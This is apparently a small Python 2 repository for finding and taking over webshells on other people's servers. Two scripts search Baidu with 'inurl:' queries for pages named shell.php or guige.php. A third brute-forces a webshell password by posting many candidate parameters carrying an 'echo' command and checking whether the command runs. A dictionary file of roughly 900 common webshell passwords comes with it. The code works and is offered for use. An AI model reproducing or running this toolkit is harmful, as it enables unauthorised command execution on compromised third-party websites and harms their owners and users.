├── BaiduAPI.py
├── WebshellCracker.py
├── WebshellSearcher.py
├── pass
    └── pass.dic
└── websites


/BaiduAPI.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # encoding:utf8
 3 | 
 4 | import requests
 5 | from bs4 import BeautifulSoup
 6 | import sys
 7 | 
 8 | # config-start
 9 | keyword = sys.argv[1]
10 | resultFileName = "webshells.txt"
11 | # config-end
12 | 
13 | url = "http://www.baidu.com/s?wd=" + keyword
14 | print "Getting : " + url + "...",
15 | response = requests.get(url)
16 | print "OK!"
17 | content = response.content
18 | status_code = response.status_code
19 | soup = BeautifulSoup(content, "html.parser")
20 | links = soup.findAll("a")
21 | for link in links:
22 |     try:
23 |         dstURL = link['href']
24 |         if (dstURL.startswith("http://") or dstURL.startswith("https://")) and dstURL.startswith("http://www.baidu.com/link?url=") :
25 |             result_url = requests.get(dstURL).url
26 |             file = open(resultFileName, "a+")
27 |             file.write(result_url + "\r\n")
28 |             file.close()
29 |             print result_url
30 |     except Exception as e:
31 |         pass
32 | 


--------------------------------------------------------------------------------
/WebshellCracker.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # encoding:utf8
 3 | 
 4 | import requests
 5 | import random
 6 | import time
 7 | import linecache
 8 | 
 9 | startTime = time.time()
10 | 
11 | size = 100
12 | filename = "password.txt"
13 | passwordFile = open(filename,'rU').readlines()
14 | url = "http://127.0.0.1/shell.php"
15 | 
16 | def getRandomString(randomlength=4):
17 |     str = ""
18 |     chars = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z','A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z','0','1','2','3','4','5','6','7','8','9']
19 |     for i in range(randomlength):
20 |     	str += chars[(random.randint(0, len(chars) - 1))]
21 |     return str
22 | 
23 | def addProIntoUrl(url,pro):
24 | 	return url + "&" + pro;
25 | 
26 | def checkTrueOrFalseByGET(url, keyword):
27 | 	return ((keyword) in (requests.get(url).text))
28 | 
29 | def checkTrueOrFalseByPOST(url, postData, keyword):
30 | 	print requests.post(url, data=postData).text
31 | 	return ((keyword) in (requests.post(url, data=postData).text))
32 | 
33 | # chars = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z','A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z','0','1','2','3','4','5','6','7','8','9']
34 | chars = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
35 | 
36 | # for i in range(97,123):
37 | # 	for j in range(97,123):
38 | # 		for k in range(97,123):
39 | # 			for l in range(97,123):
40 | # 				tempurl = url
41 | # 				randomString = getRandomString()
42 | # 				print chr(i) + chr(j) + chr(k) + chr(l)
43 | # 				for m in range(97,123):
44 | # 					password = chr(i) + chr(j) + chr(k) + chr(l) + chr(m)
45 | # 					tempurl += "&" + password + "=echo " + randomString + ";"
46 | # 				print tempurl
47 | # 				if checkTrueOrFalseByGET(tempurl, randomString):
48 | # 					exit(1)
49 | 
50 | 
51 | for i in range(97,123):
52 | 	for j in range(97,123):
53 | 		postData = {}
54 | 		randomString = getRandomString()
55 | 		print chr(i) + chr(j)
56 | 		for k in range(97,123):
57 | 			for l in range(97,123):
58 | 				for m in range(97,123):
59 | 					password = chr(i) + chr(j) + chr(k) + chr(l) + chr(m)
60 | 					postData[password] = "echo " + randomString + ";"
61 | 		if checkTrueOrFalseByPOST(url, postData, randomString):
62 | 			exit(1)
63 | 
64 | 
65 | # passwordNumber = len(passwordFile)
66 | # print "密码个数 : " , passwordNumber
67 | # times = int(passwordNumber / size)
68 | # print "需要爆破次数 : " , times
69 | 
70 | # for i in range(times):
71 | # 	startIndex = i * size
72 | # 	endIndex = (i + 1) * size
73 | # 	print "Trying : [" , startIndex , "," , endIndex , "]"
74 | # 	newlist = passwordFile[startIndex:endIndex]
75 | # 	tempurl = url + "?lilac=0"
76 | # 	randomString = getRandomString()
77 | # 	for line in newlist:
78 | # 		command = "echo '" + randomString + "';"
79 | # 		password = line[0:-1]
80 | # 		tempurl += "&" + password + "=" + command
81 | # 		# print tempurl
82 | # 	# print tempurl
83 | # 	# Request the url
84 | # 	print tempurl
85 | # 	response = requests.get(tempurl)
86 | # 	content = response.text
87 | # 	print "-----------"
88 | # 	print content
89 | # 	print "-----------"
90 | # 	if randomString in content:
91 | # 		print "[" , startIndex , "," , endIndex , "]"
92 | # 		break
93 | # 	print "\n\n\n\n"
94 | 
95 | endTime = time.time()
96 | print endTime - startTime
97 | 


--------------------------------------------------------------------------------
/WebshellSearcher.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # encoding:utf8
 3 | 
 4 | import os
 5 | 
 6 | keywords = ['guige.php', 'shell.php']
 7 | syntax = "inurl:"
 8 | 
 9 | for keyword in keywords:
10 |     print "==== Searching for '" + keyword + "' ==="
11 |     command = "python ./BaiduAPI.py " + syntax + keyword
12 |     os.system(command)
13 | 


--------------------------------------------------------------------------------
/pass/pass.dic:
--------------------------------------------------------------------------------
  1 | 584521
  2 | nohack
  3 | 45189946
  4 | hacksb
  5 | hackersb
  6 | heixiaozi
  7 | 360
  8 | sb360
  9 | 360sb
 10 | yushiwuzheng
 11 | wuzheng
 12 | spider
 13 | angel
 14 | 4ngel
 15 | yyswxws
 16 | lcx
 17 | nc
 18 | hackqingshu
 19 | qingshu
 20 | qingshu$
 21 | sz
 22 | sunzi
 23 | shunzi
 24 | 123!@#
 25 | !@#123
 26 | 123654
 27 | 123654789
 28 | 123654789!
 29 | 123654789.
 30 | aspadmin
 31 | phpadmin
 32 | jspadmin
 33 | aspxadmin
 34 | noadmin
 35 | cms
 36 | iamnotadmin
 37 | fuckit
 38 | fuckhack
 39 | fuckhacker
 40 | F19ht
 41 | f19ht
 42 | fight
 43 | hkmjj
 44 | chinared
 45 | ouou
 46 | hake
 47 | hakecc
 48 | wwwhakecc
 49 | 520hack
 50 | hack520
 51 | r4sky
 52 | ghost
 53 | baidu
 54 | yy
 55 | daoqq
 56 | daohao
 57 | sb
 58 | youaresb
 59 | caonimadebi
 60 | caonimade
 61 | worinima
 62 | wocaonima
 63 | caonimei
 64 | lunnijie
 65 | whatweb
 66 | baidusb
 67 | baiduadmin
 68 | chenxue
 69 | cnot
 70 | xxoxx
 71 | rinima
 72 | hkk007
 73 | chengnuo
 74 | wrsk
 75 | wrsky
 76 | 54321
 77 | yuemo
 78 | 521
 79 | *******
 80 | 4lert
 81 | yuemo
 82 | maek
 83 | dreamh
 84 | Shell
 85 | xxxxx
 86 | shell
 87 | 10011C120105101
 88 | fclshark
 89 | 19880118
 90 | 376186027
 91 | 654321
 92 | 535039
 93 | 000
 94 | 123
 95 | windows
 96 | darkst
 97 | jcksyes
 98 | jinjin
 99 | 12345
100 | sq19880602
101 | jtk2352
102 | sq19880602
103 | kill
104 | chengnuo
105 | 45189946
106 | 123321
107 | hacker
108 | hack
109 | haode
110 | chuang
111 | aiezu
112 | 981246
113 | et520
114 | 12
115 | lx
116 | lengxue
117 | 20080808
118 | aoyunhui
119 | fucker
120 | tiger
121 | tig
122 | tag
123 | iloveshell
124 | loveshell
125 | yrpx
126 | air
127 | hkk007
128 | wrsk
129 | rinima
130 | caonima
131 | ceshi2009
132 | kissy
133 | 520
134 | 52013
135 | 5201314
136 | 3452510
137 | 1314520
138 | rfkl
139 | username
140 | 847381979
141 | jing
142 | winner
143 | 4816535
144 | shaomo
145 | zhack
146 | mama
147 | mama520
148 | fuckyou
149 | Fuckyou
150 | FuckYou
151 | lengfeng
152 | lengfengsk
153 | rensheng
154 | rs
155 | fuck
156 | 123go
157 | 1
158 | xiaowu
159 | Baike
160 | admin888
161 | honker
162 | hongker
163 | liner
164 | lin
165 | xiaoyi
166 | xiaoe
167 | 1
168 | login
169 | 888999
170 | Evav
171 | 13572468
172 | Sa
173 | sa
174 | sasa
175 | dangdang
176 | webshell
177 | lovehack7758
178 | rfkl
179 | 123
180 | darkst
181 | asp
182 | hkmm
183 | 133135136
184 | 80sec
185 | G.xp
186 | gxp
187 | 1992724
188 | satan
189 | Satan
190 | yong
191 | fst
192 | f.s.t
193 | F.S.T
194 | noid
195 | sadness
196 | caodan
197 | 96315001
198 | admin
199 | axiao
200 | 847381979
201 | rfkl
202 | yuemo
203 | 12
204 | bzxyd
205 | tonecan
206 | bzxyd
207 | 5201314
208 | 3est
209 | sin
210 | 654321
211 | ghost
212 | C
213 | cc
214 | evil
215 | evilhk
216 | evilhack
217 | evilhacker
218 | yong
219 | ying
220 | webadmin
221 | webadmin2
222 | HqzX
223 | tx
224 | tengxin
225 | tengxunsb
226 | danteng
227 | rusuan
228 | dantong
229 | youguest
230 | cmdshell
231 | Webshell
232 | WebShell
233 | sh3ll
234 | h4ck
235 | h4ck3r
236 | ufo
237 | ufohack
238 | jiaozu
239 | huaidan
240 | jiaozhu
241 | lover
242 | love
243 | daoker
244 | daokers
245 | daoke
246 | !@#123
247 | *******
248 | 000
249 | 1
250 | 10011C120105101
251 | 111
252 | 12
253 | 123
254 | 123!@#
255 | 123321
256 | 12345
257 | 123456
258 | 123654
259 | 123654789
260 | 123654789!
261 | 123654789.
262 | 123go
263 | 1314520
264 | 133135136
265 | 13572468
266 | 19880118
267 | 1992724
268 | 20080808
269 | 3452510
270 | 360
271 | 360sb
272 | 376186027
273 | 3est
274 | 45189946
275 | 4816535
276 | 4lert
277 | 4ngel
278 | 520
279 | 52013
280 | 5201314
281 | 520hack
282 | 521
283 | 535039
284 | 54321
285 | 584521
286 | 654321
287 | 80sec
288 | 847381979
289 | 888999
290 | 96315001
291 | 981246
292 | admin
293 | admin888
294 | aiezu
295 | air
296 | angel
297 | aoyunhui
298 | asp
299 | aspadmin
300 | aspxadmin
301 | axiao
302 | baidu
303 | baiduadmin
304 | baidusb
305 | Baike
306 | bzxyd
307 | C
308 | caodan
309 | caonima
310 | caonimade
311 | caonimadebi
312 | caonimei
313 | cc
314 | ceshi2009
315 | chengnuo
316 | chenxue
317 | chinared
318 | chuang
319 | cmdshell
320 | cms
321 | cnot
322 | dangdang
323 | danteng
324 | dantong
325 | daohao
326 | daoke
327 | daoker
328 | daokers
329 | daoqq
330 | darkst
331 | dreamh
332 | et520
333 | Evav
334 | evil
335 | evilhack
336 | evilhacker
337 | evilhk
338 | F.S.T
339 | f19ht
340 | fclshark
341 | fight
342 | fst
343 | fuck
344 | fucker
345 | fuckhack
346 | fuckhacker
347 | fuckit
348 | FuckYou
349 | G.xp
350 | ghost
351 | gxp
352 | h4ck
353 | h4ck3r
354 | hack
355 | hack520
356 | hacker
357 | hackersb
358 | hackqingshu
359 | hacksb
360 | hake
361 | hakecc
362 | haode
363 | heixiaozi
364 | hkk007
365 | hkmjj
366 | hkmm
367 | hongker
368 | honker
369 | HqzX
370 | huaidan
371 | iamnotadmin
372 | iloveshell
373 | jcksyes
374 | jiaozhu
375 | jiaozu
376 | jing
377 | jinjin
378 | jspadmin
379 | jtk2352
380 | kill
381 | kissy
382 | lcx
383 | lengfeng
384 | lengfengsk
385 | lengxue
386 | lin
387 | liner
388 | login
389 | love
390 | lovehack7758
391 | lover
392 | loveshell
393 | lunnijie
394 | lx
395 | maek
396 | mama
397 | mama520
398 | nc
399 | noadmin
400 | nohack
401 | noid
402 | ouou
403 | phpadmin
404 | qingshu
405 | qingshu$
406 | r4sky
407 | rensheng
408 | rfkl
409 | rinima
410 | rs
411 | rusuan
412 | sa
413 | sadness
414 | sasa
415 | Satan
416 | sb
417 | sb360
418 | sh3ll
419 | shaomo
420 | shell
421 | shunzi
422 | sin
423 | spider
424 | sq19880602
425 | sunzi
426 | sz
427 | guige
428 | T00ls
429 | tag
430 | tengxin
431 | tengxunsb
432 | tig
433 | tiger
434 | tonecan
435 | tx
436 | ufo
437 | ufohack
438 | username
439 | webadmin
440 | webadmin2
441 | WebShell
442 | whatweb
443 | windows
444 | winner
445 | wocaonima
446 | worinima
447 | wrsk
448 | wrsky
449 | wuzheng
450 | wwwhakecc
451 | xiaoe
452 | xiaowu
453 | xiaoyi
454 | xxoxx
455 | xxxxx
456 | ying
457 | yong
458 | youaresb
459 | youguest
460 | yrpx
461 | yuemo
462 | yushiwuzheng
463 | yy
464 | yyswxws
465 | zhack
466 | 01314
467 | 584521
468 | nohack
469 | 45189946
470 | baidu
471 | 123
472 | chenxue
473 | and
474 | 913720787
475 | cnot
476 | xxoxx
477 | rinima
478 | hkk007
479 | chengnuo
480 | 5556661221
481 | 123456
482 | wrsk
483 | 54321
484 | yuemo
485 | jcksyes
486 | 521
487 | *******
488 | 4lert
489 | yuemo
490 | hacker
491 | xxxxx
492 | 10011C120105101
493 | fclshark
494 | 19880118
495 | 376186027
496 | admin
497 | 654321
498 | 535039
499 | admin
500 | 000
501 | 123
502 | darkst
503 | jcksyes
504 | 123456
505 | jcksyes
506 | jinjin
507 | 12345
508 | sq19880602
509 | jtk2352
510 | sq19880602
511 | kill
512 | chengnuo
513 | 45189946
514 | 123321
515 | admin
516 | hacker
517 | admin
518 | haode
519 | chuang
520 | 981246
521 | et520
522 | winner
523 | 12
524 | 20080808
525 | yrpx
526 | hkk007
527 | wrsk
528 | rinima
529 | ceshi2009
530 | 5201314
531 | rfkl
532 | 847381979
533 | jing
534 | winner
535 | 4816535
536 | zhack
537 | mama520
538 | 123go
539 | 1
540 | 888999
541 | 13572468
542 | sasa
543 | dangdang
544 | lovehack7758
545 | rfkl
546 | 123
547 | 80sec
548 | hkmm
549 | 133135136
550 | 1992724
551 | yong
552 | noid
553 | caodan
554 | 96315001
555 | admin
556 | axiao
557 | 847381979
558 | rfkl
559 | yuemo
560 | 12
561 | 535039
562 | bzxyd
563 | tonecan
564 | bzxyd
565 | 5201314
566 | 3est
567 | sin
568 | 654321
569 | ghost
570 | C
571 | yong
572 | webadmin
573 | 5909062xzx
574 | iolhcw19891209
575 | hehe
576 | china
577 | 584521
578 | nohack
579 | 45189946
580 | baidu
581 | 123
582 | chenxue
583 | and
584 | 913720787
585 | cnot
586 | xxoxx
587 | rinima
588 | hkk007
589 | chengnuo
590 | 5556661221
591 | 123456
592 | wrsk
593 | 54321
594 | yuemo
595 | jcksyes
596 | 521
597 | *******
598 | 4lert
599 | yuemo
600 | 5201314
601 | hacker
602 | xxxxx
603 | 10011C120105101
604 | fclshark
605 | 19880118
606 | 376186027
607 | admin
608 | 654321
609 | 535039
610 | admin
611 | 000
612 | 123
613 | darkst
614 | jcksyesHacker
615 | 123456
616 | jcksyes
617 | jinjinWebShell
618 | 12345
619 | sq19880602
620 | jtk2352
621 | sq19880602
622 | killEdu
623 | chengnuo
624 | 45189946
625 | 123321
626 | admin
627 | hacker
628 | admin
629 | haode
630 | chuang
631 | 981246
632 | et520
633 | winner
634 | 12
635 | 20080808
636 | yrpx
637 | hkk007
638 | wrsk
639 | rinima
640 | ceshi2009
641 | 5201314
642 | rfkl
643 | 847381979
644 | jing
645 | winner
646 | 4816535
647 | zhack
648 | mama520
649 | 123go
650 | 1
651 | 888999
652 | 13572468
653 | sasa
654 | dangdang
655 | lovehack7758
656 | rfkl
657 | 123
658 | 80sec
659 | hkmm
660 | 133135136
661 | 1992724
662 | yong
663 | noid
664 | caodan
665 | 96315001
666 | admin
667 | axiao
668 | 847381979
669 | rfkl
670 | yuemo
671 | 12
672 | 535039
673 | bzxyd
674 | tonecan
675 | bzxyd
676 | 5201314
677 | 3est
678 | sin
679 | 654321
680 | ghost
681 | C
682 | yong
683 | webadmin
684 | 5909062xzx
685 | iolhcw19891209
686 | hehe
687 | 5242129
688 | 520
689 | yy520
690 | xuexue
691 | xiaobai
692 | tg
693 | hack19
694 | 914
695 | 7
696 | 1234
697 | beyond
698 | 123456
699 | beyond
700 | zhu
701 | 2010
702 | 20010
703 | 110
704 | 2012
705 | sh
706 | 147852
707 | chengmin
708 | admin
709 | mask
710 | linyu520
711 | hhtzgh
712 | 007007
713 | xiaozan
714 | www.91ri.org
715 | jiejie
716 | 13822642918
717 | xiaojun
718 | yanhua
719 | a
720 | qqq
721 | yanghai
722 | 168888
723 | latcue
724 | 542531
725 | lin
726 | xiaohao
727 | 13311
728 | hack121314
729 | maya66
730 | admin
731 | 123456
732 | 1478523
733 | maya66
734 | aishang
735 | hyj123
736 | woaizuozuo
737 | baiduwocaoni74
738 | 4422663
739 | Beta3
740 | 8420910
741 | hkxsDoorhkmm
742 | 10086
743 | hkk007
744 | wrsk
745 | rinima
746 | ceshi2009
747 | 5201314
748 | rfkl
749 | 847381979
750 | jing
751 | winner
752 | 4816535
753 | zhack
754 | mama520
755 | 123go
756 | 1
757 | 888999
758 | 13572468
759 | sasa
760 | dangdang
761 | lovehack7758
762 | rfkl
763 | 123
764 | 1992724
765 | yong
766 | noid
767 | caodan
768 | 96315001
769 | admin
770 | axiao
771 | 847381979
772 | rfkl
773 | yuemo
774 | 12
775 | 535039
776 | bzxyd
777 | tonecan
778 | bzxyd
779 | 5201314
780 | 3est
781 | sin
782 | 654321
783 | ghost
784 | C
785 | yong
786 | webadmin
787 | 5909062xzx
788 | iolhcw19891209
789 | admin
790 | qwe32100
791 | xiaoke
792 | panda
793 | xiaoyu
794 | 123
795 | maomao3
796 | Acces
797 | 123456
798 | 596861877
799 | jieshao
800 | hxhack
801 | 1024
802 | 1024或520
803 | love
804 | 1
805 | 574787
806 | ding130694343
807 | 1273568669
808 | NTIw
809 | YXBwbGVxaQ==
810 | www.91ri.org
811 | 4133133
812 | 478421259
813 | 1992
814 | admin123
815 | 204298273196298273197298273
816 | 5121705或123
817 | xm
818 | 4911687
819 | 5121705
820 | laoduo
821 | seo0510
822 | xiaoke
823 | 574787
824 | cmder
825 | 2131321
826 | 574787
827 | 195298273203298273193298273193298273203298273
828 | wxb630513
829 | aa296419130
830 | 8585392
831 | simin
832 | 135
833 | 116166
834 | 8475352
835 | 978332153
836 | wangzi
837 | xiaobai
838 | 464630316
839 | admin$
840 | 97086407
841 | lzh
842 | soojoy
843 | gg
844 | axiao
845 | 131524
846 | 13141234567
847 | sunhao
848 | 19860625
849 | nishiwodeshei
850 | vc
851 | vc110
852 | kaifeng
853 | yangxiaochou
854 | 64559216
855 | 697467
856 | wangluoheishou
857 | a
858 | admin
859 | 192298273208298273192298273185298273187298273195298273
860 | xnhack
861 | admin
862 | TNTHK
863 | NTIw
864 | admin
865 | suanle
866 | suanle.
867 | 5858
868 | 123456jin
869 | Hlly_
870 | admin
871 | dandan
872 | DGQAIZJJxx
873 | love8
874 | bingke
875 | my3800
876 | jianlong
877 | fanhexiang
878 | hack135.
879 | str1ven93
880 | cc
881 | 454846275
882 | sxm
883 | 2564335
884 | 120
885 | 13141234567
886 | skwr
887 | kuangrenjishu
888 | xiaoxin
889 | 558
890 | xch
891 | 33201314
892 | 80499712
893 | 10086
894 | hake
895 | 1324520xxxx
896 | 789456
897 | aaa
898 | hackerxl
899 | 338956
900 | 5174187
901 | !@#asd
902 | 794743652
903 | xxoo0
904 | 


--------------------------------------------------------------------------------
/websites:
--------------------------------------------------------------------------------
1 | http://127.0.0.1/shell.php
2 | 
3 | 


--------------------------------------------------------------------------------